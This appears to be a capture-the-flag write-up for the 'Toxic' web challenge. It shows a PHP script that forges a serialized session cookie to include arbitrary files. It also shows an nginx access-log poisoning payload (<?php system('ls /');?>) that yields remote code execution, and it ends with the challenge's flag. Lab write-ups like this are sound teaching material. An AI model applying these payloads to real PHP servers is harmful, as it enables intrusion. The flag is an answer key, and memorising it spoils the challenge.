Toxic (web)

Toxic is a web page written in PHP that shows information about frogs.

The file to be rendered is set in the PHPSESSID Cookie which is the base64 of a PageModel serialization.

The flag is used just at the entrypoint.sh file as follows:

We need to exploit the PHPSESSID Cookie to force the server to read the flag file instead of index.html

To access another file tampering the cookie we can use this following script:

<?php

class PageModel{

    public $file;

    public function __destruct(){

        include($this->file);

    }

}

$page = new PageModel;

$page->file = '[file name]';

echo "\n\nCOOKIE: ".base64_encode(serialize($page))."\n\n";

The first trouble is that we don't know the file's name.

We can ask ourselves, What do we know right now about the application? Well, we know that is a PHP application that's running on a nginx server.

OK! We know how to get an RCE if we can access the file /var/log/nginx/access.log so let's check if we can access this file.

 

Very well, now we can try to inject our payload:

<?php system('ls /');?>

And finally, we have the file name: flag_yFs8d and now we can simply access the flag.

---

Flag: HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}